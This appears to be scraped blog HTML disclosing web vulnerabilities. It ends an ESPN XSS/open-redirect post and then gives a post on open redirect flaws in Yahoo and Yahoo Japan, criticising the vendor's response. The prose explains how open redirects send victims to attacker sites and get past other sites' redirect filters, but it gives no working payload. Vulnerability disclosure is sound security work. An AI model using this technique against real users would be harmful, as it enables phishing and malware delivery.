<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espn.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.sg/2014/12/espn-espn.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) </b>Those security problems were reported to ESPN in early 2014. However, they are still unpatched.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/36">http://seclists.org/fulldisclosure/2014/Dec/36</a></span></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html">http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register</a></span></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/security/espn-xss-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/espn-xss-open-redirect/</span></a></div>
<div style="margin: 0px;">
<a href="https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest</span></a></div>
<div style="margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss-and-dest-redirect#notes"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss</span></a></div>
<div style="margin: 0px;">
<a href="https://www.facebook.com/permalink.php?story_fbid=435630669942495&id=361076084064621" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>435630669942495</span></a></div>
<div style="margin: 0px;">
<a href="http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e</span></a></div>
<div style="margin: 0px;">
<a href="http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html</span></a></div>
<div style="margin: 0px;">
<a href="http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inzeed.tumblr.com/post/<wbr></wbr>120775132901/espn-xss-open-<wbr></wbr>redirect</span></a></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_730f11d" target="_blank">http://ittechnology.lofter.<wbr></wbr>com/post/1cfbf60d_730f11d</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>2422320542015551014553/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/">https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1631949187023558&id=1567915086760302" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1631949187023558</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://twitter.com/tetraphibious/status/606824322896785408" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/<wbr></wbr>tetraphibious/status/<wbr></wbr>606824322896785408</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg" target="_blank">https://plus.google.com/u/0/<wbr></wbr>110001022997295385049/posts/<wbr></wbr>TBiJP5A3CXg</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/">http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/</a><br /><br /><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<br class="Apple-interchange-newline" /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-70880315210631509042015-06-05T04:43:00.000-07:002015-06-05T04:46:17.716-07:00Yahoo Yahoo.com Yahoo.co.jp Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYU8CHsgdSUXgAEGPkT-wuCqMKOyx_oJDNwhy26R69Koarscuf0qWl5UQdGYZZyZKkzwGs_uGUl8CkUvVgGacgd8jkNXHGLOsy5-USsuPQKEi8NKpTZ6XI7UMnLKXNIr0d5wFHFyJD4hI/s1600/yahoo_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYU8CHsgdSUXgAEGPkT-wuCqMKOyx_oJDNwhy26R69Koarscuf0qWl5UQdGYZZyZKkzwGs_uGUl8CkUvVgGacgd8jkNXHGLOsy5-USsuPQKEi8NKpTZ6XI7UMnLKXNIr0d5wFHFyJD4hI/s400/yahoo_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Yahoo Yahoo.com <a href="http://yahoo.co.jp/" target="_blank">Yahoo.co.jp</a> Open Redirect (Unvalidated Redirects and Forwards) Web Security Bugs</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Though Yahoo lists open redirect vulnerability on its bug bounty program. However, it seems Yahoo do not take this vulnerability seriously at all.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Multiple Open Redirect vulnerabilities were reported Yahoo. All Yahoo's responses were "It is working as designed". However, these vulnerabilities were patched later.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several other security researcher complained about getting similar treatment, too.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2014/Jan/51" style="-webkit-transition: color 0.3s; display: inline; line-height: 19.6000003814697px; outline: none; text-align: justify; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Jan/51</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Feb/119" target="_blank">http://seclists.org/<wbr></wbr>fulldisclosure/2014/Feb/119</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All Open Redirect Vulnerabilities are intended behavior? If so, why patch them later?</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtlvjOuGxueVYPln944OD3GBNo1zVeomCwf_3eynvePIH5priU8DGJnRYNXqClN5HUfGY5ABxQtE5roQ-Kitwe4W-ZDcZzOzgt5dhnF72mRClQH39L18W2ZXi6diigHibc7B6HukHWf4/s1600/yahoo_wont_fix_meitu_1.jpg" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQtlvjOuGxueVYPln944OD3GBNo1zVeomCwf_3eynvePIH5priU8DGJnRYNXqClN5HUfGY5ABxQtE5roQ-Kitwe4W-ZDcZzOzgt5dhnF72mRClQH39L18W2ZXi6diigHibc7B6HukHWf4/s1600/yahoo_wont_fix_meitu_1.jpg" style="cursor: move;" width="400" /></span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br />From report of CNET, Yahoo's users were attacked by redirection vulnerabilities. "Yahoo.com visitors over the last few days may have been served with malware via the Yahoo ad network, according to Fox IT, a security firm in the Netherlands. Users visiting pages with the malicious ads were redirected to sites armed with code that exploits vulnerabilities in Java and installs a variety of different malware. " </span></div>
<div style="margin: 0px;">
<a href="http://www.cnet.com/news/yahoo-users-exposed-to-malware-attack/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.cnet.com/news/<wbr></wbr>yahoo-users-exposed-to-<wbr></wbr>malware-attack/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Moreover, since Yahoo is well-known worldwide. these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, Amazon, Godaddy, Alibaba, Netease, e.g. by bypassing their Open Redirect filters (<a href="http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html">Covert Redirect</a>). These cyber security bug problems have not been patched. Other similar web and computer flaws will be published in the near future.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Disclosed by:</span></div>
</div>
<div>
<div>
<div style="padding: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136" style="line-height: 28px;">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;">http://www.tetraph.com/<wbr></wbr>wangjing</a></span></div>
</div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Both Yahoo and Yahoo Japan online web application has a computer cyber security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
